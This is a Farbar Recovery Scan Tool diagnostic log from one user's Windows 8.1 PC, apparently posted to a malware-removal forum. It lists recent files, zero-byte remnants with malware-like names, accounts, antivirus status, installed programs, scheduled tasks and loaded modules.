2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk
2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL
2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH
2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final
2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6
2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley
2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer
2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration
2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce
2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla
2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie
2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat
2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM
2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft
2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc
2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery
2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva
2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt
2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed
2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft
2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer
2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare
2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft
2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft
2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios
2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old
2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics
2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer

==================== Files in the root of some directories =======

2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg

Some zero byte size files/folders:
==========================
C:\Windows\mssecsvc.exe
C:\Windows\SysWOW64\taskshostservices.exe
C:\Windows\System32\taskshostservices.exe
C:\Windows\System32\Drivers\WinmonProcessMonitor.sys
C:\Windows\SysWOW64\Drivers\winmon.sys
C:\Windows\SysWOW64\Drivers\winmonfs.sys
C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-13 14:45

==================== End of FRST.txt ============================

Link to post
Share on other sites

    addition.txt

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (17-02-2019 12:47:56)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
